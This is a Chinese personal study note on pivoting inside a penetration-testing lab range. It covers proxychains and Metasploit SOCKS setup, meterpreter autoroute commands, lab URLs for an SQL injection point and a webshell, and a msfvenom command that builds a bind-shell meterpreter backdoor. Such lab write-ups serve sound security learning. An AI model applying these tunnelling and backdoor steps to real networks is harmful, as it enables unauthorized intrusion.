这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

只当作个人学习笔记,所以写得比较跳跃噢
QQ截图20211112115311.jpg
QQ截图20211112115345.jpg
QQ图片20211112115701.png
域靶场的话最好先拿到靶场的拓扑图,然后按照拓扑图去配置IP
最好是和拓扑图上的一模一样
如果实在嫌麻烦,那么设置成同一网段就行了,具体IP的话就等DCHP分配吧(主机模式)

proxychains这个的话在msf里面确实有,不过和视频的不一样,这个的话叫做proxychains_proxy,
是4a和5的集合版,改一下版本就可以修改版本了,建议用4,然后不要用2222,这个的话我这边腾讯云和kali都stop了
换其他的就可以了,run一下。之后进入/etc/proxychains4.conf最下面添加sock4 kaliip msfport就可以了
最后proxychains4 nmap -sn 192.168.22.128(kali是192.168.1.128)
发现扫描成功

Proxifier

全局代理推荐用,局部代理用下面这个

SocksCap64

这个是默认局部代理
QQ截图20211112123829.jpg
QQ截图20211112124909.jpg
QQ截图20211112124920.jpg

msf的思路

就是拿到meterpreter,然后添加路由

获取网络接口:run get_local_subnets 获取的是对方的网络接口环境
查看路由地址:run autoroute -p 查看meterpreter的路由环境
添加路由地址:run autoroute -s 192.168.22.0/24 添加到meterpreter的路由上,这样探测的时候就知道这个网段可以
探测了,然后就遍历查找接口

这样子我们就可以在msf中探测另一网段的主机了,也就是内网的
假如说我们想用meterpreter以外的东西也通过msf的隧道进行渗透,那么我们就用
开启本地代理:
msf6下
search socks
use 0 (proxy啥的)
set srvport 2222
run

然后/etc/proxychains4.conf改一改就可以用了

下面是抄

Target2:
探针目标-利用 WEB 漏洞(SQL 注入)-后台获取 webshell 权限-获取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门 shell
1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24

抄的部分总结:

用正向连接的木马,因为反向代理的话内部主机找不到外部的,所以用正向代理
剩下的就是正常渗透了